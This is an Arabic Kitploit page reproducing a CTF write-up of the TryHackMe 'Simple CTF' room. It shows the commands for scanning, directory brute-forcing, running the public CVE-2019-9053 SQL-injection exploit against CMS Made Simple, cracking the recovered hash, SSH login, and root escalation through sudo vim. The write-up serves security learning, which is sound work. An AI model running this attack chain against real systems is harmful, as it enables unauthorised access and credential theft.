Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/imperialx1104/simple-ctf-writeup
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

شرح تفصيلي احترافي لتحدي TryHackMe Simple CTF يغطي جمع المعلومات، حقن SQL في CMS Made Simple (CVE-2019-9053)، استعادة بيانات الاعتماد، الوصول عبر SSH، تصعيد الامتيازات عبر Vim، واختراق صلاحيات الجذر.

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Simple-CTF-Writeup

شرح احترافي لغرفة Simple CTF على منصة TryHackMe يغطي عملية التعداد، وحقن SQL في CMS Made Simple (CVE-2019-9053)، واستعادة بيانات الاعتماد، والوصول عبر SSH، وتصعيد الامتيازات عبر Vim، والوصول إلى صلاحيات الجذر.

TryHackMe - شرح Simple CTF

شرح كامل لغرفة Simple CTF على TryHackMe، يغطي الاستطلاع والتعداد والاستغلال واستعادة بيانات الاعتماد وتصعيد الامتيازات والحصول على الأعلام.


معلومات الغرفة

الحقلالقيمة
المنصةTryHackMe
اسم الغرفةSimple CTF
الصعوبةسهل
الفئةاستغلال الويب وتصعيد الامتيازات في لينكس
المؤلفSaahil Gupta (ImperialX1104)

الهدف

الهدف من هذه الغرفة هو:

  • تعداد الجهاز المستهدف
  • اكتشاف الخدمات والتطبيقات المخفية
  • استغلال نظام إدارة محتوى (CMS) ضعيف
  • استعادة بيانات الاعتماد
  • الحصول على وصول عبر SSH
  • تصعيد الامتيازات إلى صلاحيات الجذر
  • الحصول على العلمين

نظرة عامة على الهجوم

root@kitploit:~
Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

الاستطلاع

اكتشاف المضيف

كانت الخطوة الأولى هي التحقق من الاتصال بالجهاز المستهدف.

الأمر

root@kitploit:~
ping 10.49.175.174

النتيجة

استجاب المضيف بنجاح، مما أكد أنه كان قابلاً للوصول.

لقطة الشاشة

Ping Scan


تعداد المنافذ

تم إجراء فحص شامل باستخدام Nmap لتحديد الخدمات المكشوفة.

الأمر

root@kitploit:~
nmap -A -v 10.49.175.174

النتائج

المنفذالخدمةالإصدار
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

الملاحظات المهمة

  • تسجيل الدخول المجهول عبر FTP مفعّل
  • خادم الويب Apache يعمل
  • SSH مكشوف على المنفذ 2222
  • تم اكتشاف ملف robots.txt

لقطة الشاشة

Nmap Enumeration


تعداد الويب

عند الانتقال إلى خادم الويب المستهدف، ظهرت الصفحة الافتراضية لخادم Apache.

الرابط

root@kitploit:~
http://10.49.175.174

لقطة الشاشة

Apache Default Page

في هذه المرحلة، لم يكن هناك سطح هجوم واضح.


تعداد الدلائل

لتحديد الموارد المخفية، تم تنفيذ تخمين عنيف للدلائل باستخدام FFUF.

الأمر

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

النتائج

root@kitploit:~
simple [Status: 301]

لقطة الشاشة

FFUF Enumeration

تم اكتشاف دليل باسم /simple.


اكتشاف نظام إدارة المحتوى

أدى الانتقال إلى الدليل المكتشف إلى الكشف عن تثبيت نظام إدارة محتوى (CMS).

الرابط

root@kitploit:~
http://10.49.175.174/simple

لقطة الشاشة

CMS Made Simple

نظام إدارة المحتوى المحدد

root@kitploit:~
CMS Made Simple 2.2.8

سيثبت رقم الإصدار لاحقًا أنه حاسم.


البحث عن الثغرات

تم البحث عن ثغرات إصدار نظام إدارة المحتوى باستخدام SearchSploit.

الأمر

root@kitploit:~
searchsploit "CMS Made Simple"

النتيجة

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

لقطة الشاشة

SearchSploit Results

تم تحديد ثغرة حقن SQL معروفة.


الحصول على الاستغلال

تم نسخ الاستغلال محليًا لتحليله وتنفيذه.

الأمر

root@kitploit:~
searchsploit -m 46635

المخرجات

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

لقطة الشاشة

Exploit Download


الاستغلال

تم تنفيذ الاستغلال المتاح للعموم ضد مثيل نظام إدارة المحتوى المستهدف.

الأمر

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

استخراج بيانات الاعتماد

نجح الاستغلال في استخراج معلومات من قاعدة البيانات الخلفية.

المخرجات

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

لقطة الشاشة

Credential Extraction

المعلومات المستردة

العنصرالقيمة
اسم المستخدمmitch
البريد الإلكتروني[email protected]
الملح1dac0d92e9fa6bb2

كسر كلمة المرور

تم كسر التجزئة المستخرجة باستخدام Hashcat.

الأمر

root@kitploit:~
hashcat -m 20 hash.txt --show

المخرجات

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

بيانات الاعتماد المستردة

الحقلالقيمة
اسم المستخدمmitch
كلمة المرورsecret

لقطة الشاشة

Hashcat Password Recovery


الوصول الأولي

تم اختبار بيانات الاعتماد المستردة ضد خدمة SSH.

الأمر

root@kitploit:~
ssh [email protected] -p 2222

كلمة المرور

root@kitploit:~
secret

النتيجة

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

لقطة الشاشة

SSH Access

أدى المصادقة الناجحة إلى توفير وصول إلى الصدفة كمستخدم mitch.


علم المستخدم

بعد الحصول على الوصول، تم العثور على علم المستخدم في الدليل الرئيسي للمستخدم Mitch.

الأوامر

root@kitploit:~
whoami
cd ~
cat user.txt

المخرجات

root@kitploit:~
G00d j0b, keep up!

لقطة الشاشة

User Flag


تصعيد الامتيازات

تعداد صلاحيات Sudo

كشف فحص صلاحيات sudo عن إعداد مثير للاهتمام.

الأمر

root@kitploit:~
sudo -l

المخرجات

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

لقطة الشاشة

sudo -l Output

يسمح هذا الإعداد للمستخدم بتشغيل Vim بصلاحيات الجذر دون الحاجة إلى إدخال كلمة مرور.


الوصول إلى الجذر

تشغيل Vim بصلاحيات الجذر:

root@kitploit:~
sudo vim

نظرًا لأن Vim كان يعمل بصلاحيات مرتفعة، فقد أمكن استخدامه للوصول إلى الملفات المملوكة للمستخدم الجذر.

لقطة الشاشة

Root Access via Vim


علم الجذر

تم العثور على علم الجذر في الدليل الخاص بالمستخدم الجذر.

الأمر

root@kitploit:~
:! cat /root/root.txt

المخرجات

root@kitploit:~
W3ll d0n3. You made it!

لقطة الشاشة

Root Flag


الأعلام التي تم الحصول عليها

علم المستخدم

root@kitploit:~
G00d j0b, keep up!

علم الجذر

root@kitploit:~
W3ll d0n3. You made it!

ملخص سلسلة الهجوم

root@kitploit:~
Nmap Scan
    ↓
Web Enumeration
    ↓
Directory Discovery (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
SearchSploit Research
    ↓
CVE-2019-9053 SQL Injection
    ↓
Credential Extraction
    ↓
Hash Cracking
    ↓
SSH Login (mitch:secret)
    ↓
User Flag
    ↓
sudo -l
    ↓
Vim Privilege Escalation
    ↓
Root Flag

الدروس المستفادة

التعداد مهم

لم يكن نظام إدارة المحتوى الضعيف ظاهرًا في الصفحة الرئيسية، وتطلب تعداد الدلائل لاكتشافه.

تحديد الإصدار أمر بالغ الأهمية

أدت معرفة إصدار نظام إدارة المحتوى الدقيق مباشرة إلى ثغرة معروفة.

إعادة استخدام بيانات الاعتماد

يجب دائمًا اختبار بيانات الاعتماد المستردة ضد جميع الخدمات المتاحة.

الأخطاء في إعدادات sudo خطيرة

السماح بالتنفيذ بصلاحيات مرتفعة لمحررات مثل Vim يمكن أن يؤدي إلى اختراق النظام بالكامل.


الأدوات المستخدمة

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

الخاتمة

أظهرت هذه الغرفة سلسلة هجوم كاملة من التعداد الأولي إلى اختراق الجذر الكامل. ومن خلال الجمع بين تعداد تطبيقات الويب، واستغلال حقن SQL، وكسر كلمات المرور، وتقنيات تصعيد الامتيازات في لينكس، تم تحقيق السيطرة الكاملة على النظام المستهدف.

تُعد هذه الغرفة مقدمة ممتازة لمنهجية اختبار الاختراق الواقعية، وتسلط الضوء على أهمية تحديث البرامج بشكل صحيح، وأمان بيانات الاعتماد، والتحكم في الوصول بأقل امتياز.


المؤلف

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ إذا وجدت هذا الشرح مفيدًا، ففكر في وضع نجمة على المستودع والتواصل معي على GitHub.

تنزيل الأداة